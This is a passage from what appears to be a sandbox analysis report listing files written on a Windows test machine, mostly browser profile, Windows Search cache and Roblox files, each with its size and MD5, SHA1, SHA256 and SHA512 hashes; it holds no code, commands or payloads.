                                                                                                                        3de07a0900d69d3e911d01f3d8f3effe597bbd9c1a221e6679e7e3322d2716ddd607035768efac788ccd26112e0b5b0631ce77c158a0f26e696c2556b205eca5

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        c724eee9644cadb60096fd58f87721a2

                                                                                                                        SHA1

                                                                                                                        176ee720aca3e37cba23ed7bda2850763942d791

                                                                                                                        SHA256

                                                                                                                        6517ed1dfe235e953a1b74e5bda6b27bdd51ba10d8eb29aae5d99b1addb9474b

                                                                                                                        SHA512

                                                                                                                        8a76a92b9556e37b361b16916391a4640d778ac68dfae9b5aa8b8dcd7a84d764d513025410c4623dd39e15e46e8121e44baac059c66a520a6f1e097d350d7a48

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        1c2602198c6f74d06c9cc6979258b21f

                                                                                                                        SHA1

                                                                                                                        6ad4414eb3501b3a70bfef536df4957dcba81dc5

                                                                                                                        SHA256

                                                                                                                        aa906a65e298e1c40a1e4108053165c605c9edcc3de18c3f4cf9815335ba8816

                                                                                                                        SHA512

                                                                                                                        6d6c324b5d5f03f68dc21b29620dd91dcae78f5a09cd372b3e53810464255d8a0f03b8e78146114b91c5a168a6463c6d09a55b036c7791f55a581d73780c5497

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        4bd8c7ee93ca0bd4da79ebfb777efe72

                                                                                                                        SHA1

                                                                                                                        abbb80d049c8b65591336c6b5c0ccd68bb6ece07

                                                                                                                        SHA256

                                                                                                                        647a8e3ba87ccb8efaf730c7bd79367de6f4fa1a0aa1f593ed2a969305c0ab01

                                                                                                                        SHA512

                                                                                                                        4fc08a859ab36aa9c16dc38ee8675585aa23f21e1506bb52eb93f6de5179541f6f43fa80d41f57aefa084ae37ed5526399172608e5082652b8507d2f3ed2a16d

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        18d377932b197b675d66c40b02c852a0

                                                                                                                        SHA1

                                                                                                                        47c0f32ad5fe7b796daac719231884c653f2fe78

                                                                                                                        SHA256

                                                                                                                        32acfa5410d9d3ca95abccb45295f623bcb137b7ce7bed1247c227bf6a76d74e

                                                                                                                        SHA512

                                                                                                                        c062fe5eb114552ff9f72c8544803df69c3ac653ebe7e66c098bd08014e9667b0fa3dc3a9af67d4255c1273dbe38b2477e6d8dff9cd4d012e16815bdb28335ce

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        e7c1e4620b1f2ed10f8f09dba8c8b4ff

                                                                                                                        SHA1

                                                                                                                        2d040da97651d4e433c9e6a2e3db22954d7a67be

                                                                                                                        SHA256

                                                                                                                        fba1d975344c29c731af09952cda5573be9c73b07e5f3386fab50c210696f4fd

                                                                                                                        SHA512

                                                                                                                        6baf6975216fbbe9f6fbb501474e2b06864f8ed7d009a64b05f6ddf668b009f20d8ef523efe1c40ab9faadc479f31387df93b7c07b4724ed1a710389905b8522

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        42ec89bc7bb4752fc7fc5ab4ce0ef2be

                                                                                                                        SHA1

                                                                                                                        b1d3aeeb8c488647345913378dc5b59dfaa8d06b

                                                                                                                        SHA256

                                                                                                                        e415cda0412793cb923f577dfe488b597e0e664dd213ee50ffab2bc78b84ed32

                                                                                                                        SHA512

                                                                                                                        83c5a10a1479235f859fbcd43378891ec96da9750a7a785277bca2988667833154bed5842d24a0ec79cdfa1b78c6a3ace44addbd4f02c98dc10a09a3172d9a18

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        1395f17de01ad956acdb7fece50114ba

                                                                                                                        SHA1

                                                                                                                        a2349a6c010ac76820f605f4418b0edc7eb2fb87

                                                                                                                        SHA256

                                                                                                                        962d6155cbf47f9bf4f37767c7382c373cacfc7c1e7c048161a81338f369d568

                                                                                                                        SHA512

                                                                                                                        6d2c91439f5d6c41dd6e436719d8c34983eb6154b3ace020542293a90bd6c53b104c2a1f05a10f4977dac992141da3c6500372ec29da3163ba2d468484248f45

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        a6d6f6d50b940a204cde675df79af3d6

                                                                                                                        SHA1

                                                                                                                        a72ae63db6b2c0fc84b81be0463cb5b6449ed9ef

                                                                                                                        SHA256

                                                                                                                        7d6eb777bde6c211276c57a4adc06850568d73cb260ac4dd896a4cc9187a89e6

                                                                                                                        SHA512

                                                                                                                        fd3c8f0aefa355c7d8aad0846f805cfa6175a4d63491e8cd20182bab0a7fbeced64ddce889191cc91972e607ddd8ab4fea7aba68489c67c87b7a2a08cb439465

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        609e756cf9a36f29e1728cf66948641e

                                                                                                                        SHA1

                                                                                                                        6a4226c7c8742c2fd4cc1a2daaec21b3599b1060

                                                                                                                        SHA256

                                                                                                                        50a56b994c5881c606276d3f2f6bfeaebf9d606a9877b5d78de07f324c9734fe

                                                                                                                        SHA512

                                                                                                                        02b35aabcf6abfe7d53b14f5568824d30c69d9a572325e379ac7243d3c420a67ecd38d8f75f480ae9b9e2ea08cf9c9d46f1024e01252b4c39cbb7fd63f78e046

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        92cc62278b0cac2260bbd435f7b78a5f

                                                                                                                        SHA1

                                                                                                                        a543d158b6481efb37256e5874aa0672327684c2

                                                                                                                        SHA256

                                                                                                                        3194ff8b31c749730c2d037cb25d785e92a3306e2049c89a81553cc11e2ca0b0

                                                                                                                        SHA512

                                                                                                                        8c708baf6c901095e0f6b4531121361a390dbe3738f6a8061da7ef575bf5fc6933bf100a3fa23244dfc6578a44bccf36b91ace1ad6f0c8f92032015eb3119938

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        226690e85f4e484b8e7d60ada1cc9665

                                                                                                                        SHA1

                                                                                                                        29e306ee13826fbf8dbad4ebb6251cc91a026ffb

                                                                                                                        SHA256

                                                                                                                        81c930874d841b0f7c2e63f2f46d4e03b73e5cda7e184f458a9dc010ea03b115

                                                                                                                        SHA512

                                                                                                                        4e4bb9177d6feac5f60b904884ac7d286bf93a16730e63872c9c9347f9e29214ebbe3afe5b40a5bf1d0ca2e4b6045076cc92c485b8216492f56341c898e0741d

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        3KB

                                                                                                                        MD5

                                                                                                                        1b4a3dbcf3a7802aa354fcac18ed810e

                                                                                                                        SHA1

                                                                                                                        440d0f25fba119a6d3f2b747112ba0191a7c290c

                                                                                                                        SHA256

                                                                                                                        3af97f4ab41f43204680a18fa163b8f365697116faf1cbb9655bd9ac6f89e800

                                                                                                                        SHA512

                                                                                                                        b4dcbe25cb412c9bc901b310d265e075ead9518495b2b3c24f97a8e84929d60655aa458e28cdfa2911367d8b57481dd364c539d00b984477c8a84d5c1f3c7aa7

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        6a82732062aaf04fe4e35709b0c3c583

                                                                                                                        SHA1

                                                                                                                        9074fbc57bdd09aa68c298a1dfeb4397fd031aa9

                                                                                                                        SHA256

                                                                                                                        2a6a9f3255fba8545fdb312b90f44c18e550963c4ca7056cab58a2fbae3666d9

                                                                                                                        SHA512

                                                                                                                        504d4910173b64cd80588903b7574927d3b65a034f35fcd6e4fb052c5271f1c2f74a6d833bf1c630fd0d55391a3116a2d7d21048b386c731c3f8c31474745d1e

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        214b82e6b537b449378d7556673448d1

                                                                                                                        SHA1

                                                                                                                        11737c3b4fef40c2add5694ac97355b7471fda53

                                                                                                                        SHA256

                                                                                                                        0bbd7517bb290a9f58dfcb16f706919a7d5e57134b45020b841d76ab13661d89

                                                                                                                        SHA512

                                                                                                                        96b7a22ca1e6f243f0719294c2cfbcc07c4714ed78a19ff59228e722b70cadc9c6b3fca47ee3140353051a03dfd050758805887982463dc01456bbbe7b2af9d8

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        220c496f6e5b4387414c25a33ebb0038

                                                                                                                        SHA1

                                                                                                                        8c45ea2dfc9698919ce773ebcdff00faa18da5da

                                                                                                                        SHA256

                                                                                                                        a0c30a238fa6e4fc27da2733f219b05dd2ced70a06dd56777842ad55a843f9e7

                                                                                                                        SHA512

                                                                                                                        81bb91282ae2bc930b9784a868c9eb87b1db3daf343ae0c77bf366f73d64e0ef61200ef140aebe52d68e406f96f0874702a2b2a7f9e13fbf9de55e4d07a8ca35

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        399ce480440726231671a7c221cbb53d

                                                                                                                        SHA1

                                                                                                                        a285c04cf8802d8b460480871065df4260b9753a

                                                                                                                        SHA256

                                                                                                                        703b01bd0c27cb30325d09e0235dcf63fcff617c2b2f5bf7ec4250faaf7cc30f

                                                                                                                        SHA512

                                                                                                                        fa1ae5c5e33a49e9c8408bac3716a94ccf13ad35ac1dea0849fe0463cc831e378d1a9652bdde801f99f54a14ad66a3d5d183db39aca12077d283698fcaac769f

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        19ce0ada40eb19e059a251e8d00523de

                                                                                                                        SHA1

                                                                                                                        9d720b45a0910657c80b1b7c78490191044c4975

                                                                                                                        SHA256

                                                                                                                        fe66508afd95a5c7262f01d2abf105741b8b453f4a65193997fcfa1a88e44c98

                                                                                                                        SHA512

                                                                                                                        0bc9a80f5a783e3f7c58603261d6eb71da5676c9e84a5709f903273bcf868963bfc67a98eea3fa504e9046ad60cd2b244799341c6b54ba180ae17cffcf704b1a

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        fab466a843eb23f0f835bb20d7213c24

                                                                                                                        SHA1

                                                                                                                        5a7cbd32f30a0f7bd36cf95b18b5a469a682132f

                                                                                                                        SHA256

                                                                                                                        3475d556d360d8c58c4c76ca99167c7dcce7f5cf30f5704af61e1c399c8732fd

                                                                                                                        SHA512

                                                                                                                        04556020be43ba03a2d78df1eb527f7e4e2a1f4c8e7fd9589dc4ec69adcb686c354f1e1db0e5d064b2714c95fe379456d1145e95b3b215c2f66a9cc95cd7ad1e

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        f9c8ece428740e58f84a6848dc9fe33f

                                                                                                                        SHA1

                                                                                                                        44b936293884549b591dff3de0d01e0267e164a9

                                                                                                                        SHA256

                                                                                                                        fcb99b2acaf1fc69967aa739b040570cc400ee5c8dfc8a527d26af8840016230

                                                                                                                        SHA512

                                                                                                                        b2e2fb2f7f3d5bf7e1e3a9b9abc040110cd066a6181e498bd88b2eeb9cbc0ea2503c5f53acca735c89412e8d82b056c936fa18aeffd7be56ec85d3afc071688c

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        c0d730b00ee05f502adbf9f475d1d7f7

                                                                                                                        SHA1

                                                                                                                        2085357fa45aef2f87eb49d968392660490155d9

                                                                                                                        SHA256

                                                                                                                        67dde69a8c33d609d85c31f48c60d1fade08b215e2564c0c4b8ffc31bd3827c2

                                                                                                                        SHA512

                                                                                                                        7bdc0d8df1f6f63213e115a261b8d8e4c29b99c47a72d249c082486b847ac2116bcd7fb04e0707cd659e01c1e1ccce244042165c569d42151c4543c504a18dbe

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        8568e1622ea4eb0a6de8f4a1cb6ff9e5

                                                                                                                        SHA1

                                                                                                                        179c9a3e9fc48b2b7885d1de9d999f17e8512cb6

                                                                                                                        SHA256

                                                                                                                        541fcc51fead5a308e6d94a6667cb078f19d6551118eb2cd6f4330cc6dac96fd

                                                                                                                        SHA512

                                                                                                                        e8c4d2b3466c11787c2cbab12fb57a78210765d73d4b697e28fc3016d51958517772c4415873d68f72388c23bf08311629621120c22de5d934b715b543134d25

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        9bf1c509c9f438e2b56b263894967bfd

                                                                                                                        SHA1

                                                                                                                        a086f1f172895cc934b55b636322879bf25b10b6

                                                                                                                        SHA256

                                                                                                                        67c76a484955715f7d78120ee9bb5cceb9040e75a43dedd8f79f9c281076d787

                                                                                                                        SHA512

                                                                                                                        18392a7056c63259ecdcbcf626284784389c5629da428dc878130a333b25428231f9254ae3446f5d26542c6f21443b6948d9e761a95e6998035b3c25255bbd27

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        90869664e7ac2161363b47a752870a94

                                                                                                                        SHA1

                                                                                                                        75a83b7f60d9714877b158c9145b413cd8b7a790

                                                                                                                        SHA256

                                                                                                                        a1f47ea6dd5380cf2f5e800735c2f0742869e356085c4d8df1609e2e44e769aa

                                                                                                                        SHA512

                                                                                                                        0b8f296c3cbd005e031f66341ecc2b1032dfb4c1cd5aa1d6bd1c86781059b96390e89d5418ee5b791759ffb60017868e869f959271588e4e0ae02d9ee5130eab

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        5KB

                                                                                                                        MD5

                                                                                                                        081ebfc9696c690425e77415408c860c

                                                                                                                        SHA1

                                                                                                                        771d2010d9194fb09a93e2151946d26b2d10aa76

                                                                                                                        SHA256

                                                                                                                        34cd2d6e34ac38758b59f41d57fdfd02311f85fe2fe278e89dfbc866247475e9

                                                                                                                        SHA512

                                                                                                                        79853743fe64834f6237b0a4eb0bc4f6797fd3bf23b0760963b3baa3767b98c7adc489581cbde3f69de67277548b1b27367b389c8b9a8e501fec205966c221e0

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        106ea646513c43038f3ce2785439d3be

                                                                                                                        SHA1

                                                                                                                        7807d2f31c1a8dbd7ebe045363eba652b7f2d9ce

                                                                                                                        SHA256

                                                                                                                        9a35c6643960bc29b6b8ed9e250a73f95af74951ede9f89dbc3919c2b6652a85

                                                                                                                        SHA512

                                                                                                                        ca0ec11f708acf2e9335d322e0b9fa17c25945fb90f02ee888aae4dcc4a9e9e6e84de4e9595a27fae2e582583aaa4d7f436d9e7c1ed5497d0d56f6542a3cb41e

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe593aae.TMP

                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        c41725632ddb995307e60866309f90bd

                                                                                                                        SHA1

                                                                                                                        490b4b496ebd44c748f7f210e4e14fdb281692b8

                                                                                                                        SHA256

                                                                                                                        495e616404c783a0efaed335c05ccdf71601f9921381a3b986e84b9aecef67df

                                                                                                                        SHA512

                                                                                                                        cefcd71685af0427c6339de0bd4d3f439754ed6eb142937ddcee9e085be750d5fc52751d081e8ae3dfc84900cd006c39ba60624d8719c8955378a188a4e78914

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                        Filesize

                                                                                                                        16B

                                                                                                                        MD5

                                                                                                                        6752a1d65b201c13b62ea44016eb221f

                                                                                                                        SHA1

                                                                                                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                        SHA256

                                                                                                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                        SHA512

                                                                                                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                        Filesize

                                                                                                                        11KB

                                                                                                                        MD5

                                                                                                                        39f2bdb02c810425e11951c25ec3673e

                                                                                                                        SHA1

                                                                                                                        3228288e6c57bd83755e40e944f950b07e40d688

                                                                                                                        SHA256

                                                                                                                        64cbf65c163e3a0ad629dcdf04e0ef3f11c7774323bd6f6c70d934256857d420

                                                                                                                        SHA512

                                                                                                                        f150fd96b6c86686cf501b2d19f8b20cc4c27cb306bbeed67a71d2b0643a1eb27eb103e9ac31e581015df6365ee547b2c75fb7d3b7e80c4fd092ddeb3fc745a7

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                        Filesize

                                                                                                                        12KB

                                                                                                                        MD5

                                                                                                                        3111c4e4b71695db2e0267128a8f9afb

                                                                                                                        SHA1

                                                                                                                        15c9a93928cbf6cf8618c3a784bfda830b06c944

                                                                                                                        SHA256

                                                                                                                        10196384496bb93090f45c85055fe51384ff93c287c9974bce193bb4cca2ca05

                                                                                                                        SHA512

                                                                                                                        f610a6aa974cd1255b0bf085cd66bfd9f58813c962f8fb5c7bbbe1db23cda12726ec5434d092f2eef6cc5eb4e4349c282ea5c414bd69e59a7e74b74c0af92542

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                        Filesize

                                                                                                                        11KB

                                                                                                                        MD5

                                                                                                                        315c01a4fe0c0bfa81b8862c0d8e0c7f

                                                                                                                        SHA1

                                                                                                                        b5770548432d77581823086ce04416f7ab439649

                                                                                                                        SHA256

                                                                                                                        6feb4c74772fc09ea646606b4beaf169ec27a2aaef275a697700c2c2a285d54c

                                                                                                                        SHA512

                                                                                                                        d89e0235ba965eb35741c21bd71fc16f1fb624da252e55674ba580065f7de6a87fa79f1f1ca4fbb20c3ec87f15b76b24b22f86bda55b680fa0e9e71f4e531dce

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SETLANG_EXE_15

                                                                                                                        Filesize

                                                                                                                        36KB

                                                                                                                        MD5

                                                                                                                        0e2a09c8b94747fa78ec836b5711c0c0

                                                                                                                        SHA1

                                                                                                                        92495421ad887f27f53784c470884802797025ad

                                                                                                                        SHA256

                                                                                                                        0c1cdbbf6d974764aad46477863059eaec7b1717a7d26b025f0f8fe24338bb36

                                                                                                                        SHA512

                                                                                                                        61530a33a6109467962ba51371821ea55bb36cd2abc0e7a15f270abf62340e9166e66a1b10f4de9a306b368820802c4adb9653b9a5acd6f1e825e60128fd2409

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel

                                                                                                                        Filesize

                                                                                                                        36KB

                                                                                                                        MD5

                                                                                                                        fb5f8866e1f4c9c1c7f4d377934ff4b2

                                                                                                                        SHA1

                                                                                                                        d0a329e387fb7bcba205364938417a67dbb4118a

                                                                                                                        SHA256

                                                                                                                        1649ec9493be27f76ae7304927d383f8a53dd3e41ea1678bacaff33120ea4170

                                                                                                                        SHA512

                                                                                                                        0fbe2843dfeab7373cde0643b20c073fdc2fcbefc5ae581fd1656c253dfa94e8bba4d348e95cc40d1e872456ecca894b462860aeac8b92cedb11a7cad634798c

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{66873ae1-6dd1-474d-8530-0e18c6cd2fa5}\0.0.filtertrie.intermediate.txt

                                                                                                                        Filesize

                                                                                                                        28KB

                                                                                                                        MD5

                                                                                                                        439760aeefa564ae587b282bf5943235

                                                                                                                        SHA1

                                                                                                                        509ba6b1805916d1e8e6599220a8c69805ebeb9c

                                                                                                                        SHA256

                                                                                                                        448a970272fbdfc9fd7b919ffd6389208b5fc100fcf80e96b1683e99a678175b

                                                                                                                        SHA512

                                                                                                                        1b1af1a7d08d740c07a17c41af37c4916c5eb1e1cbc780870d8de58bcead35ca95d1ddb7e3031805a6d5b105dcae1b86dd84b175098280db29984213e0dcfe37

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{66873ae1-6dd1-474d-8530-0e18c6cd2fa5}\0.1.filtertrie.intermediate.txt

                                                                                                                        Filesize

                                                                                                                        5B

                                                                                                                        MD5

                                                                                                                        34bd1dfb9f72cf4f86e6df6da0a9e49a

                                                                                                                        SHA1

                                                                                                                        5f96d66f33c81c0b10df2128d3860e3cb7e89563

                                                                                                                        SHA256

                                                                                                                        8e1e6a3d56796a245d0c7b0849548932fee803bbdb03f6e289495830e017f14c

                                                                                                                        SHA512

                                                                                                                        e3787de7c4bc70ca62234d9a4cdc6bd665bffa66debe3851ee3e8e49e7498b9f1cbc01294bf5e9f75de13fb78d05879e82fa4b89ee45623fe5bf7ac7e48eda96

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{66873ae1-6dd1-474d-8530-0e18c6cd2fa5}\0.2.filtertrie.intermediate.txt

                                                                                                                        Filesize

                                                                                                                        5B

                                                                                                                        MD5

                                                                                                                        c204e9faaf8565ad333828beff2d786e

                                                                                                                        SHA1

                                                                                                                        7d23864f5e2a12c1a5f93b555d2d3e7c8f78eec1

                                                                                                                        SHA256

                                                                                                                        d65b6a3bf11a27a1ced1f7e98082246e40cf01289fd47fe4a5ed46c221f2f73f

                                                                                                                        SHA512

                                                                                                                        e72f4f79a4ae2e5e40a41b322bc0408a6dec282f90e01e0a8aaedf9fb9d6f04a60f45a844595727539c1643328e9c1b989b90785271cc30a6550bbda6b1909f8

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{66873ae1-6dd1-474d-8530-0e18c6cd2fa5}\Apps.index

                                                                                                                        Filesize

                                                                                                                        1.0MB

                                                                                                                        MD5

                                                                                                                        874311080a36bd3ff206aa4e1c9ba976

                                                                                                                        SHA1

                                                                                                                        1dedaef509790a5b3b27f375984c3bff2d1ed534

                                                                                                                        SHA256

                                                                                                                        29f4f0e2349124a245f0715dc2b4d022246f23a5221855f816e6a3d5c0dee67a

                                                                                                                        SHA512

                                                                                                                        b69a8e1a1739ca293a0c82dda453a84ae686037febb1d8e1cdd6edc709b641ee2c1ba09ea7b840fa6c368639b3a6eaff4bb645e13e74ef45b0445a1784c9682d

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{86742764-40b3-4f08-a142-46b4ee2d4215}\Apps.ft

                                                                                                                        Filesize

                                                                                                                        38KB

                                                                                                                        MD5

                                                                                                                        7de9468b91dc972d1e1cb3857b7fd023

                                                                                                                        SHA1

                                                                                                                        f3b3e81cda32ac735c7d33b341182e65a8a4573b

                                                                                                                        SHA256

                                                                                                                        8f18b559596257be6293154d629b34cd6ffb1ddb52734f361a822c5dfaf4746b

                                                                                                                        SHA512

                                                                                                                        8859047951198790b2c8eeba3cc7606784dbfa64d0c8b6095d3cd78c4f40e55a25a7070e0ca21f1065f30774cf1b72a6cbeff6fa28ce3d0439d0c24fc17546de

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133565039826591031.txt

                                                                                                                        Filesize

                                                                                                                        75KB

                                                                                                                        MD5

                                                                                                                        44d05b24750eaeffda3d4980b0d57a9c

                                                                                                                        SHA1

                                                                                                                        bb06f5a16d8f9971746deec0c9f051086d9d99d2

                                                                                                                        SHA256

                                                                                                                        935bdabebbcde7d6c37146134e37d830bb789cf26dafed574fa6623b6fb8f359

                                                                                                                        SHA512

                                                                                                                        80109722ca534ab0b1f642b2298baf15eb9fb0ee6248d788ca8ad0b9123365403329509c3dc984703d41f8ecfa2e19da2707d04cf144164066723fc5831a8ea2

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\N3A1GXDL\microsoft.windows[1].xml

                                                                                                                        Filesize

                                                                                                                        97B

                                                                                                                        MD5

                                                                                                                        2a048584ff1532f817c94dc91dcd1288

                                                                                                                        SHA1

                                                                                                                        a8feaa50ff20598096757253f961ed62cc8e2569

                                                                                                                        SHA256

                                                                                                                        ac0e9ccd0c2a91247d80d72c35930928c1da245701ca832072bd977c61d3901a

                                                                                                                        SHA512

                                                                                                                        b6e50c342123202657e524ce15e02851da3b8573494e0ba98f7b70c6438fcbee100df4eac302d1dcbd3d3123bdf14a11d232c96d998c569431887317419c1d86

                                                                                                                      • C:\Users\Admin\AppData\Local\Roblox\Downloads\roblox-player\2071a20b3379c50b5481716951e9a32b

                                                                                                                        Filesize

                                                                                                                        5.0MB

                                                                                                                        MD5

                                                                                                                        2071a20b3379c50b5481716951e9a32b

                                                                                                                        SHA1

                                                                                                                        727ee72cf45db1f163e2740072d8c55d52fb2741

                                                                                                                        SHA256

                                                                                                                        26764f24835796bc0837862a162a31c7a5e047490f1231e21a037dc6c5a46a97

                                                                                                                        SHA512

                                                                                                                        c96e3fbb9ab584743bd85a52ad7c0abd70ae808bb107e7717e5e1fa19faa5882869e630aa4833bfe282d23f16cc1fe48e81732ec9c607455c08d17748e437496

                                                                                                                      • C:\Users\Admin\AppData\Local\Roblox\logs\cacert.pem

                                                                                                                        Filesize

                                                                                                                        227KB

                                                                                                                        MD5

                                                                                                                        0194eb945475f93844c0fae769c0fa0b

                                                                                                                        SHA1

                                                                                                                        d72876a801c702348ea5b4b4a333c484f2a721fd

                                                                                                                        SHA256

                                                                                                                        a6bc06b8255e4afe2eeff34684605d04df9ec246fc201bf5e44137987189a0d3

                                                                                                                        SHA512

                                                                                                                        72a00fe6b9111cab22f1f424f815a617be2041a3857a6265b004ca1bfd10f345ca33369cd43009b483f9436ccbcd69c70f7033a85d94527b1f39846b75b43c17

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

                                                                                                                        Filesize

                                                                                                                        2B

                                                                                                                        MD5

                                                                                                                        f3b25701fe362ec84616a93a45ce9998

                                                                                                                        SHA1

                                                                                                                        d62636d8caec13f04e28442a0a6fa1afeb024bbb

                                                                                                                        SHA256

                                                                                                                        b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

                                                                                                                        SHA512

                                                                                                                        98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\db\data.safe.bin

                                                                                                                        Filesize

                                                                                                                        9KB

                                                                                                                        MD5

                                                                                                                        bc7ab87cf3e23e35c49a120fd8698560

                                                                                                                        SHA1

                                                                                                                        d7eb55917d3db13749c2067652efeb51a2d921e0

                                                                                                                        SHA256

                                                                                                                        9e12caa0523eb4dfed6b90197e170e0cd1e609af41a2e4000aab40bdddfd999d

                                                                                                                        SHA512

